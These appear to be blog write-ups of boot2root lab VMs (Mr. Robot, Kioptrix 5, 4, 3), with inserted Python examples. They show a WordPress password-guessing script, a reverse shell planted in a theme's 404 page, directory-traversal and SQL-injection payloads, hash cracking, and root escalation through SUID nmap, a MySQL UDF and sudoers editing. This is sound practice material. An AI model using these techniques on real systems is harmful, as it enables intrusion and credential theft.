Looks like the victim is running Apache on ports 80/tcp and 443/tcp, so it's safe to assume we will be attacking a web server. Let's do some further scanning of the victim with nikto to find any vulnerabilities on the system.

With nikto I was able to see that it is a WordPress site. I also see /wp-login.php, readme.html, license.txt and robots.txt, which look pretty interesting. Before we check these files, let's browse the web server and see what it gives us.

Well, the server gives us a fancy intro followed by a message and a list of commands we can run. None of them were that interesting except the join command, which asks for your email to "join" them. I didn't enter an email; instead I looked into the files mentioned earlier. Let's check them out!

BINGO! Found the first key, which turned out to be 073403c8a58a1f80d943455fb30724b9, and also found a file called fsocity.dic, which turns out to be a dictionary file. Maybe we will use this later? For now let's save the file and continue with the attack.

Key 1:

073403c8a58a1f80d943455fb30724b9

According to the readme.html file the victim is running WordPress version 4.3.9. I checked the license.txt file but found nothing of interest in there. Now let's check out /wp-login.php.

On the login page I first checked for default credentials by entering admin:admin, but it said the username was invalid. However, having watched the show and knowing that the main character is Elliot, I tried elliot as both the username and the password.

Looks like we are on to something! I got the password wrong, but WordPress's error message confirms that elliot is a valid username on the site: the login form returns a different error for an unknown username than for a wrong password, which lets an attacker enumerate usernames. I will run a dictionary attack against the WordPress login using the fsocity.dic file acquired earlier. Before doing so I will make the wordlist smaller by removing its many duplicate entries, using the commands listed below; this makes the attack much faster when guessing elliot's password.
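Here is an added Python example of the two things this step relies on; it is not code from the write-up. dedupe_wordlist does what the wordlist-shrinking commands do, user_exists turns the differing error messages into a username check, and dictionary_attack walks the list. The WordPress error strings are assumed from 4.x's default messages, the target is a constructed fake_wordpress function (with a made-up password) so the script runs offline, and make_http_post is the real transport for a wp-login.php URL you supply.

```python
import urllib.error
import urllib.parse
import urllib.request

# Default wp-login.php error strings (assumed from WordPress 4.x; verify against the real page).
INVALID_USER = "Invalid username"
WRONG_PASSWORD = "The password you entered for the username"


def dedupe_wordlist(lines):
    """Drop blank lines and repeats while keeping first-seen order (fsocity.dic is mostly duplicates)."""
    seen, words = set(), []
    for line in lines:
        word = line.rstrip("\r\n")
        if word and word not in seen:
            seen.add(word)
            words.append(word)
    return words


def classify(status, body):
    """Map a wp-login.php response to one of: success, no_user, bad_password, unknown."""
    if status == 302:            # a good login redirects to wp-admin
        return "success"
    if INVALID_USER in body:
        return "no_user"
    if WRONG_PASSWORD in body:
        return "bad_password"
    return "unknown"


def user_exists(username, post):
    """Username enumeration: a wrong password for a real user gives a different error than a fake user."""
    status, body = post(username, "definitely-not-the-password")
    return classify(status, body) in ("bad_password", "success")


def dictionary_attack(username, words, post):
    """Try each word as the password; returns the first one that logs in, or None."""
    if not user_exists(username, post):
        return None
    for word in words:
        if classify(*post(username, word)) == "success":
            return word
    return None


def make_http_post(login_url):
    """Real transport: POST the login form without following the redirect that marks success."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None   # let the 302 surface as an HTTPError instead of being followed

    opener = urllib.request.build_opener(NoRedirect)

    def post(username, password):
        data = urllib.parse.urlencode(
            {"log": username, "pwd": password, "wp-submit": "Log In"}).encode()
        try:
            with opener.open(login_url, data=data, timeout=10) as resp:
                return resp.getcode(), resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            return err.code, err.read().decode("utf-8", "replace")
    return post


def fake_wordpress(username, password):
    """Constructed stand-in for the target so the script runs offline (the password is made up)."""
    if username != "elliot":
        return 200, '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>'
    if password != "constructed-pw-1234":
        return 200, ('<div id="login_error"><strong>ERROR</strong>: The password you entered '
                     'for the username <strong>elliot</strong> is incorrect.</div>')
    return 302, ""


if __name__ == "__main__":
    words = dedupe_wordlist(["abc\n", "abc\n", "\n", "constructed-pw-1234\n", "zzz\n"])
    print(len(words), "unique words")
    print("elliot exists:", user_exists("elliot", fake_wordpress))
    print("password:", dictionary_attack("elliot", words, fake_wordpress))
    # Against the real box: post = make_http_post("http://<victim>/wp-login.php")
```

Against the real box, swap fake_wordpress for make_http_post("http://<victim>/wp-login.php"); hydra or wpscan will be faster, but the logic is the same, and the 302 check is what distinguishes a real login from a 200 carrying an error message.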

It worked! There are many things I could do from here, such as checking which installed plugins are vulnerable and exploiting them, but since elliot is an Administrator I am going to try to upload a PHP file to get a reverse shell.

Note: I got php-reverse-shell from pentestmonkey; the link to the file is here. Before uploading the file, make sure to edit the $ip and $port variables. In my case my IP is 192.168.182.147 and the port I will use is 1234.

With that done, let's upload the file!

Well, it looks like WordPress blocks my PHP file from uploading. By default the media uploader only accepts a list of known file types (images, documents and so on) and .php is not among them, so a direct upload isn't going to work. It's all good, I still have another trick up my sleeve. As an Administrator I can edit the theme's files, so let's paste the code from php-reverse-shell.php into one of them instead. Go to Appearance -> Editor -> 404 Template (404.php). Add the code to the bottom and click Update File. It should look like the picture below.

Now set up the listener to catch the reverse shell.

root@kali:~# nc -lvp 1234
listening on [any] 1234 ...

With the listener ready, I use curl to request a page that doesn't exist on the site; WordPress answers with the theme's 404 template, which now runs our reverse shell code and connects back to the listener.

Got a shell back as the user daemon. Let's see if we can spawn a TTY shell. Netsec has a good blog post that helps with that; I recommend you all check it out. The post on spawning a TTY shell is here.
I used the command below to spawn a TTY shell.

python -c 'import pty; pty.spawn("/bin/sh")'

With that I snooped around and found key 2 in /home/robot/, but got permission denied; I would have to be the robot user (or root) to read it. However, in the same directory I did find a password.raw-md5 file. The name suggests an unsalted MD5 hash, which is quick to crack offline against a wordlist. Maybe this is the password to log in as robot? Let's open the file up.
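The cracking step that follows, as an added Python example rather than the page's own commands. It assumes password.raw-md5 holds user:hexdigest lines (check the real file) and that the digests are unsalted MD5, so each candidate word is hashed and compared; the sample file is constructed from md5('hello') and md5('password'), not the box's values.

```python
import hashlib


def parse_raw_md5_file(text):
    """Parse 'user:hexdigest' lines (the layout assumed for password.raw-md5; check the real file)."""
    creds = {}
    for line in text.splitlines():
        line = line.strip()
        if ":" not in line:
            continue
        user, digest = line.split(":", 1)
        creds[user.strip()] = digest.strip().lower()
    return creds


def crack_raw_md5(target_hex, wordlist):
    """Unsalted MD5: hash each candidate and compare (hashcat -m 0 does the same, much faster)."""
    target = target_hex.strip().lower()
    if len(target) != 32:
        raise ValueError("not a raw MD5 digest: %r" % target_hex)
    for word in wordlist:
        word = word.rstrip("\r\n")
        if hashlib.md5(word.encode("utf-8")).hexdigest() == target:
            return word
    return None


def crack_file(text, wordlist):
    """Crack every entry in the file; the value is None when the wordlist has no match."""
    words = [w.rstrip("\r\n") for w in wordlist]      # read once, reuse for every hash
    return {user: crack_raw_md5(digest, words)
            for user, digest in parse_raw_md5_file(text).items()}


# Constructed sample: md5("hello") and md5("password"); not the digests from the box.
SAMPLE_FILE = "robot:5d41402abc4b2a76b9719d911017c592\nguest:5f4dcc3b5aa765d61d8327deb882cf99\n"
SAMPLE_WORDS = ["letmein", "hello", "abc123"]

if __name__ == "__main__":
    print(crack_file(SAMPLE_FILE, SAMPLE_WORDS))   # robot cracks, guest does not
```

hashcat -m 0 or john --format=raw-md5 do the same job far faster on a real wordlist, and an unsalted MD5 of a dictionary word is also the kind of hash an online lookup table finds instantly.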

Nmap is installed at version 3.81, which is old enough to still have interactive mode (nmap --interactive). Inside interactive mode, !command runs a shell command, and because the nmap binary here is set SUID root, the shell it spawns runs as root. Found a useful post on this called Why You Can't Un-Root a Compromised Machine.
Check it out. It's very helpful. Now let's get our root shell and our last key.

Conclusion

Well, there you go: I got all 3 keys and a root shell on the victim VM. Had fun with this one since it dealt with Mr. Robot, which is a really cool show that I recommend to anyone interested. That's it for now. Till next time!

Part 5 of 5 of the Kioptrix series! This is a boot2root; for those not familiar with the term, the point of the game is to get a root shell. The Kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to the VMs in the PWK course, for those who want the OSCP certification. The link to download the VM can be found here. Now let's get started!

Description from author:

Note from VulnHub

100% works with VMware player6, workstation 10 & fusion 6.

May have issues with VirtualBox. If this is the case, try this ‘fix’: http://download.vulnhub.com/kioptrix/kiop2014_fix.zip (step by step screenshots for VirtualBox 4.3 & VMware Workstation 9)
About the VM

As usual, this vulnerable machine is targeted at the beginner. It’s not meant for the seasoned pentester or security geek that’s been at this sort of stuff for 10 years. Everyone needs a place to start and all I want to do is help in that regard.

Also, before powering on the VM I suggest you remove the network card and re-add it. For some oddball reason it doesn’t get its IP (well I do kinda know why but don’t want to give any details away). So just add the VM to your virtualization software, remove and then add a network card. Set it to bridge mode and you should be good to go.

This was created using ESX 5.0 and tested on Fusion, but shouldn’t be much of a problem on other platforms.

Kioptrix VM 2014 download 825Megs

MD5 (kiop2014.tar.bz2) = 1f802308f7f9f52a7a0d973fbda22c0a

SHA1 (kiop2014.tar.bz2) = 116eb311b91b28731855575a9157043666230432

Waist line 32″

p.s.: Don’t forget to read my disclaimer…

Works out of the box with VMware workstation 10, player 6, fusion 6 (Can edit the vmx file to force a downgrade for an older version – see ‘kiop2014_fix.zip’). Has been known to work with Virtualbox 4.3 or higher… First thing: try setting it to a x64 machine. Then check: http://download.vulnhub.com/kioptrix/kiop2014_fix.zip.

The Attack

Kali Linux machine

192.168.182.147

Scanning and Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.155

Found that the victim has ports 80 and 8080 open with Apache/2.2.21 running, and it also looks like the victim is running FreeBSD. Let's see what's on the victim's website.

When browsing the site, all it showed was "It works!". When checking the page source, however, I found that the server is running a web app called pChart 2.1.3, which has multiple vulnerabilities listed on the Exploit Database, located here. The one we are going to use is the directory traversal. More info on directory traversal from the OWASP site can be found here: Path Traversal and Testing Directory Traversal.

Also, what I found interesting was that browsing the server on port 8080 returned 403 Forbidden. This info might be useful later on. For now we have enough info; let's exploit this VM.

Exploitation

We will exploit the pChart 2.1.3 web app by trying a directory traversal. Using the URL below, I will see if I can get the victim to display the /etc/passwd file. If the file comes back, the victim is vulnerable to directory traversal. Note: all I did was add ?Action=View&Script=%2f..%2f..%2fetc/passwd to the URL (after index.php). The Script parameter ends up on the filesystem without being restricted to the application's own directory, and encoding the slashes as %2f is a common way past filters that look for ../ in the raw request. Looking at the info in the Exploit Database (exploit 31173) helps as well.
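To make the mechanics concrete, here is an added Python example (not code from the write-up or from pChart) that models what happens to the Script parameter: the raw value is pulled from the URL, a naive filter that searches the undecoded request for ../ is shown being bypassed by the %2f encoding, the value is decoded and joined onto the application directory with no containment check, and a hardened version rejects anything that normalises to a path outside that directory. APP_DIR and the URL path are assumed (the write-up gives neither); the directory is two levels deep, which is why two ../ reach the root, and traversal_payload takes the depth as a parameter for other layouts.

```python
import posixpath
from urllib.parse import unquote

# Assumed install directory (the write-up does not give it). It is two levels deep, which is
# why two "../" in the payload are enough to reach the filesystem root.
APP_DIR = "/www/pChart2.1.3"


def script_param(url):
    """Return the raw, still percent-encoded Script= value, as PHP sees it in QUERY_STRING."""
    query = url.partition("?")[2]
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == "Script":
            return value
    return ""


def naive_filter_blocks(raw_value):
    """A filter that looks for '../' in the request before decoding it: '%2f..%2f' slips through."""
    return "../" in raw_value


def vulnerable_resolve(app_dir, raw_value):
    """What the vulnerable code effectively does: decode the parameter, glue it onto the
    application directory and hand it to the filesystem, which collapses the '..' segments."""
    return posixpath.normpath(app_dir + "/" + unquote(raw_value))


def hardened_resolve(app_dir, raw_value):
    """Decode, normalise, then refuse anything that does not stay under app_dir.
    (On a real server also run os.path.realpath so symlinks cannot escape either.)"""
    candidate = posixpath.normpath(posixpath.join(app_dir, unquote(raw_value).lstrip("/")))
    if posixpath.commonpath([app_dir, candidate]) != app_dir:
        raise ValueError("path escapes application directory: " + candidate)
    return candidate


def escapes(app_dir, raw_value):
    """True when hardened_resolve would reject the value."""
    try:
        hardened_resolve(app_dir, raw_value)
        return False
    except ValueError:
        return True


def traversal_payload(depth, target):
    """Build the Script= value for a script directory `depth` levels deep; depth 2 is the page's payload."""
    return "%2f" + "..%2f" * depth + target.lstrip("/")


if __name__ == "__main__":
    # Host and path are assumed; only the query string comes from the write-up.
    url = ("http://192.168.182.155/pChart2.1.3/index.php?Action=View&Script="
           + traversal_payload(2, "/etc/passwd"))
    raw = script_param(url)
    print("payload:", raw)
    print("naive filter blocks it:", naive_filter_blocks(raw))
    print("vulnerable app opens:", vulnerable_resolve(APP_DIR, raw))
    print("hardened app rejects it:", escapes(APP_DIR, raw))
```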

Looks like it is vulnerable and we got our file. There is a mysql user and an ossec user, so the victim has a host intrusion detection system (OSSEC) installed, which is worth keeping in mind while we make noise on the box. Just some interesting info; let's move on with the exploitation. We still need to find a way in.

Let's see what we know. The victim is running FreeBSD and Apache/2.2.21. Let's use the same traversal to read the Apache config files and see what we get. Since this is FreeBSD, the Apache config file will be located at /usr/local/etc/apache22/httpd.conf.

Note: just FYI for those of you wondering how I knew where exactly the Apache config files were located: I didn't. I did some online research and found a page showing how to set up Apache on FreeBSD, located here, which told me where the Apache config files live.

The URL below is used to read the Apache config file through the traversal. Let's see what we find.

The config shows that the virtual host on port 8080 only serves clients whose User-Agent starts with Mozilla/4.0, which explains the 403 we got earlier. So we need to make our browser identify itself that way. In Firefox, open about:config. It prompts us with a warning, but don't worry, I know what I'm doing: click "I'll be careful, I promise!". Once in, right-click, go to New and then String, and enter the preference name general.useragent.override.

It will then ask for a string value. Make sure to enter Mozilla/4.0.

When all is done it should look like the picture below.

Now let's access the server on port 8080 again and see what it gives us.

Looks like there is a link called phptax. Lets check it out.

Looks like phptax is some sort of tax program, and it's vulnerable: phptax 0.8 - Remote Code Execution is listed on the Exploit Database. searchsploit also reports that phptax is vulnerable to a remote code execution attack.

Conclusion

Well, this one took much more time than anticipated and was harder for me than it should've been, but what you have to do is tough it out and "TRY HARDER"! That's it for the Kioptrix series. I will work on more VMs from VulnHub in the future and might do some write-ups on the previous season of the National Cyber League since it's coming up in April. We'll see. If you have any ideas or enjoyed the read then leave a comment. Thanks for reading. Till next time!

Part 4 of 5 of the Kioptrix series. The Kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to the VMs in the PWK course, for those who want the OSCP certification. The point of the game is to find a way to get a root shell on the vulnerable machine. The link to download the VM can be found here. Now let's get started!

Description from author:

Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:

1. It’s possible to get root remotely [ Edit: sorry not what I meant ]

1a. It’s possible to remotely compromise the machine

2. Stays within the target audience of this site

3. Must be “realistic” (well kinda…)

4. Should serve as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven’t done in a while.

I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post.

Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.

I would love to code some small custom application for people to exploit. But I’m an administrator not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course. *shameless plug

— A few things I must say. I made this image using a new platform. Hoping everything works but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the image to suit your fusion version.

— Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve tested the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason email comms[=]kioptrix.com

Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions.

Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys

So I hope you enjoy this one.

The Kioptrix Team

Source: http://www.kioptrix.com/blog/?p=604

**Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive**

The Attack

Kali Linux machine

192.168.182.147

Scanning and Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.154

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

I then ran a SYN stealth scan on the target and found ports 22, 80, 139, and 445 open!

Since ports 139/tcp and 445/tcp are open, let's enumerate SMB with enum4linux to check for open shares as well as usernames. enum4linux produced a lot of output, but I only show the useful parts below.

Found that the victim is running Samba 3.0.28a (no public exploits available) and got 5 usernames from the enumeration! It also attempted to map the print$ and IPC$ shares, but that didn't work. Let's try using dirb to scan the victim's website.

Checking the website, it has a login form. Let's see if it's vulnerable to SQL injection by putting a single quote ' in the username and password fields.

Well look what we have here! It is vulnerable to SQLi!!

Exploitation

I will use 2 ways to get the 2 sets of login credentials for the server. The first is a manual SQL injection and the second uses sqlmap. Both yield the same results; I just wanted to let you all know so you don't get confused. Let's get started!

Manual SQLi

Let's try an injection using one of the usernames from the SMB enumeration. I'm going to start with the user john, because I also found a john directory when using dirb. I will input john in the username field and 1' or '1'='1 in the password field. The SQL query on the back end will then look something like this:

SELECT * FROM users where username='john' and password='1' or '1'='1'

It worked!! Got john's credentials, with the password being MyNameIsJohn. The injected or '1'='1' makes the WHERE clause true for every row, so the query matches no matter what password is entered, and the application displayed john's stored password on the page.

Did the same with robert and got his credentials as well, with his password being ADGAdsafdfwt4gadfga==

Note: you can skip to Escaping restricted shell to continue the pentest, or go to SQLi using sqlmap to learn another method for getting the credentials to the server.
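Why the payload works, as an added Python example that is not the box's PHP: a constructed SQLite table holds the two accounts from the write-up, vulnerable_query builds the back-end query by string concatenation exactly as shown above, and safe_login is the same lookup with bound parameters. With the payload the vulnerable version returns every row (both users' passwords at once), while the safe version returns nothing because the quote is treated as data.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the login database; the two accounts are the ones the write-up recovered."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("john", "MyNameIsJohn"), ("robert", "ADGAdsafdfwt4gadfga==")])
    return conn


def vulnerable_query(username, password):
    """The back-end query built by string concatenation, as the write-up reconstructs it."""
    return ("SELECT * FROM users where username='%s' and password='%s'"
            % (username, password))


def vulnerable_login(conn, username, password):
    """Returns every row the (possibly injected) query matches; a real app would show the first."""
    return conn.execute(vulnerable_query(username, password)).fetchall()


def safe_login(conn, username, password):
    """Same lookup with bound parameters: the quote in the payload is just data."""
    return conn.execute(
        "SELECT * FROM users where username=? and password=?",
        (username, password)).fetchall()


if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1'='1"
    print(vulnerable_query("john", payload))
    print("vulnerable:", vulnerable_login(db, "john", payload))   # both rows come back
    print("safe:      ", safe_login(db, "john", payload))         # nothing
```

Note the precedence: AND binds tighter than OR, so the injected clause reads (username='john' AND password='1') OR '1'='1', which is true for every row. The same payload also works with a made-up username, which is why the injection can also be driven without knowing any account name.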

SQLi using sqlmap

From the output of checking whether the site was vulnerable to SQLi, together with the login form's source code below, I have enough info to perform the injection with sqlmap.

Escaping restricted shell

After logging in, I noticed that I have a restricted shell that only lets me run a few commands. Since echo is one of them, and the restricted shell is Python-based (which is why a Python expression is accepted), I can easily escape and bypass it with the command echo os.system('/bin/bash')

Well, it looks like no password is needed to access the database, and we get in as the MySQL root user. Because we are root on MySQL, we can execute commands on the operating system itself through a User Defined Function: lib_mysqludf_sys.so provides sys_exec(), which, once registered with CREATE FUNCTION ... SONAME, runs a shell command with the privileges of the mysqld process. That only yields root when MySQL itself runs as root, as it does here. In short, because we can access the MySQL server as root, we will escalate our privileges to root using UDFs. First we need to make sure lib_mysqludf_sys.so is on the server; using the whereis command I found that it was already installed.

Using sys_exec I ran usermod to add john to the admin group (which has sudo rights by default on Ubuntu) and then ran sudo su with john's password to get the root shell.

Conclusion

This was tougher than the previous level, but when it got tough I used the University of Google for some additional help. I did several exploitations which got me access to the server, and then had to use MySQL to escalate privileges to our desired root shell. If you have any questions or enjoyed the read, leave some feedback below! Well, that's it for this level. Now on to the last one!

Part 3 of the Kioptrix series. The Kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to the VMs in the PWK course, for those who want the OSCP certification. The link to download the VM can be found here. Let's get started!!

Description from author:

It’s been a while since the last Kioptrix VM challenge. Life keeps getting the way of these things you know.

After seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges, I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated.

As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being the realm of the beginner I must add. The same as the others, there’s more than one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to ones own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com

Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:

There’s a web application involved, so to have everything nice and properly displayed you really need to do this.

Hope you enjoy Kioptrix VM Level 1.2 challenge.

452 Megs

MD5 Hash : d324ffadd8e3efc1f96447eec51901f2

Have fun

Source: http://www.kioptrix.com/blog/?p=358

Starting the pentest

Kali Linux machine

192.168.182.147

Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.153

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning and Reconnaissance

Running a scan with nmap, I found OpenSSH 4.7p1 Debian 8ubuntu1.2 on port 22/tcp and Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) on port 80/tcp. The VM's OS is Linux 2.6.X. From the nmap results I can guess that we will be doing some web exploitation.

Running Nikto, I could see that the web server hosts phpMyAdmin, a free tool written in PHP for administering MySQL over the web (I smell a SQL injection later in the pentest).

I first went to the site and found it was a blog. I already knew it had phpMyAdmin from the nikto scan, but I also found it had a gallery.

After browsing the site, I found that going to "Ligoat Press Room" and clicking the sorting options (photo id) produced a URL with an id parameter, which could signify a SQL injection. After putting ' after php?id=1, the server gave us a SQL error, which means our input is placed unescaped into the query. This site is vulnerable to SQL injection!!

Exploitation

The exploitation will be separated into 3 parts: a SQL injection with sqlmap, a manual SQL injection, and the LotusCMS 3.0 eval() Remote Command Execution exploit. All 3 produce the same result, the user credentials for the vulnerable VM, which will then be used for privilege escalation to root.

SQLi using sqlmap

I will NOT be putting in all the output from sqlmap; I didn't want to dump that much info, so I only show the commands used and the important output. Now, knowing that the web server is vulnerable to SQL injection, I fired up sqlmap and ran the command below to enumerate the DBMS databases.

From the tables we can see that we got the usernames and password hashes for dreg and loneferret. We can SSH into the victim's machine with these credentials once we crack the hashes. (You can skip all the way to "Password Cracking using hashcat" unless you want to learn the other methods I used to get the passwords.)

Manual SQLi

So now I will be doing the SQL injection manually instead of with sqlmap. I used a tutorial that greatly helped me out, which I recommend to you all, called Hacking website using SQL Injection - step by step guide. If you have any questions about how and why I used a certain SQL statement, go to that tutorial, which explains it in more detail, or just leave me a comment.
With that covered, let's get started! We know from checking the site earlier that it is vulnerable to SQL injection, so what I want to know next is how many columns the query returns and which of them are displayed on the page. I will use the payload listed below to get this information. NOTE: make sure to put this after the id parameter in the URL.

-1 union select 1,2,3,4,5,6--

From the output we can tell that the query has 6 columns (a UNION with fewer or more columns errors out), with columns 2 and 3 being displayed on the page, so those are where we put the data we want to read (if you want to know more on how I got this, click on the link stated earlier). Next, I will try to find the version of the database. Since we know that column 2 is displayed, we will inject our code into that column. I will use the payload below to show exactly how it's done!

-1 union select 1,version(),3,4,5,6--

5.0.51a is a MySQL version, so we now know which SQL dialect the database speaks and that its table metadata lives in information_schema. Now we need to find what tables are located in the database and their names. We will inject using the query listed below.

Sweet! We have all the tables in the database, so let's check out dev_accounts because that one looks the most interesting. I will inject using the query listed below. Note: the CHAR() portion of the query is the name dev_accounts written as a list of ASCII codes, which avoids putting quote characters in the injection. I used the Hackbar tool to do the conversion so the query works.

Bingo!! We got the usernames and password hashes for dreg and loneferret. Now on to password cracking. (You can skip the next exploit if you want to continue with the pentest, or check out the Lotus exploit to see another way of exploiting this VM.)
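The steps above, from finding the column count through the CHAR()-encoded lookup of dev_accounts, as one added Python example rather than the page's own queries. It runs against a constructed SQLite stand-in for the gallery database (two made-up dev_accounts rows whose hashes are md5('hello') and md5('password'), not the box's), with vulnerable_page reconstructing the server side: the id value is concatenated into a six-column query and columns 2 and 3 are rendered. SQLite's sqlite_master, sqlite_version() and || play the roles that information_schema, version() and concat() play on MySQL; the comments give the MySQL form of each query.

```python
import sqlite3


def make_db():
    """Constructed SQLite stand-in for the gallery's MySQL database. The dev_accounts rows are
    made up: the hashes are md5('hello') and md5('password'), not the ones from the box."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE photos (id INTEGER, title TEXT, description TEXT,
                             filename TEXT, uploaded TEXT, views INTEGER);
        INSERT INTO photos VALUES (1, 'Press room', 'Ligoat press photo', 'p1.jpg', '2011-04-16', 3);
        CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT);
        INSERT INTO dev_accounts VALUES (1, 'dreg', '5d41402abc4b2a76b9719d911017c592');
        INSERT INTO dev_accounts VALUES (2, 'loneferret', '5f4dcc3b5aa765d61d8327deb882cf99');
    """)
    return conn


def vulnerable_page(conn, id_value):
    """Server side as reconstructed from the symptoms (not the gallery's real PHP): the id
    parameter is concatenated into a six-column query and columns 2 and 3 are rendered."""
    sql = ("SELECT id, title, description, filename, uploaded, views "
           "FROM photos WHERE id=" + id_value)
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.OperationalError as err:
        return "SQL error: %s" % err        # the leaked error is what the ' test relies on
    return "" if row is None else "<h1>%s</h1><p>%s</p>" % (row[1], row[2])


def find_column_count(page, max_cols=20):
    """Step 1: grow the UNION until the column counts match and the error disappears."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        if not page("-1 union select %s--" % cols).startswith("SQL error"):
            return n
    return None


def displayed_positions(page, n):
    """Step 2: inject distinct markers and see which of them show up in the HTML."""
    out = page("-1 union select " + ",".join("1%02d" % i for i in range(1, n + 1)) + "--")
    return [i for i in range(1, n + 1) if "1%02d" % i in out]


def char_literal(name):
    """Write a string as CHAR(...) so the injection needs no quote characters."""
    return "CHAR(" + ",".join(str(ord(c)) for c in name) + ")"


def union_read(page, n, pos, expression, from_clause=""):
    """Step 3: put an expression in a displayed column, fenced by markers so it can be cut out.
    MySQL would use concat('[[',expr,']]'); SQLite concatenates with ||."""
    cols = ["null"] * n
    cols[pos - 1] = "'[[' || (%s) || ']]'" % expression
    out = page("-1 union select " + ",".join(cols) + from_clause + "--")
    start = out.find("[[")
    return None if start < 0 else out[start + 2:out.find("]]", start)]


def dump_dev_accounts(page):
    """Version, table names, the dev_accounts definition (looked up via CHAR()) and its rows."""
    n = find_column_count(page)
    pos = displayed_positions(page, n)[0]
    version = union_read(page, n, pos, "sqlite_version()")            # MySQL: version()
    # MySQL: group_concat(table_name) from information_schema.tables where table_schema=database()
    tables = union_read(page, n, pos, "group_concat(name)",
                        " from sqlite_master where type='table'")
    # MySQL: group_concat(column_name) from information_schema.columns where table_name=CHAR(...)
    ddl = union_read(page, n, pos, "sql",
                     " from sqlite_master where name=" + char_literal("dev_accounts"))
    # MySQL: group_concat(concat(username,0x3a,password) separator ' ') from dev_accounts
    creds = union_read(page, n, pos, "group_concat(username || ':' || password, ' ')",
                       " from dev_accounts")
    return version, tables, ddl, creds


if __name__ == "__main__":
    db = make_db()
    page = lambda value: vulnerable_page(db, value)
    print(page("1'"))                      # the SQL error that gave the injection away
    for item in dump_dev_accounts(page):
        print(item)
```

Each step depends on the previous one: the column count has to match before any UNION row is returned, and the marker run tells you which column to carry the data in, which is why the page's payloads always have six values and put the interesting expression in position 2.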

Linux Privilege Escalation

Let's SSH into the victim's VM using the loneferret account.

root@kali:~# ssh loneferret@kioptrix3.com
The authenticity of host 'kioptrix3.com (192.168.182.153)' can't be established.
RSA key fingerprint is 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'kioptrix3.com,192.168.182.153' (RSA) to the list of known hosts.
loneferret@kioptrix3.com's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh CompanyPolicy.README
loneferret@Kioptrix3:~$

Let's check the CompanyPolicy.README file; that looks interesting! I also ran the sudo -l and whereis ht commands to gather some additional info.

sudo -l shows that loneferret can run the ht editor as root through sudo. An editor running as root can open and write any file, so we can edit /etc/sudoers and give ourselves a root shell! Use the command listed below to start ht (if it complains about the terminal type, run export TERM=xterm first). Once it is running, press F3 to open a file and enter /etc/sudoers.

loneferret@Kioptrix3:~$ sudo ht

Once in /etc/sudoers, add /bin/sh to the end of loneferret's entry so that the line also allows running /bin/sh as root. Then press Alt+F to open the File menu and save, and Ctrl+Z to exit. From there, sudo /bin/sh drops us into a root shell.

Conclusion

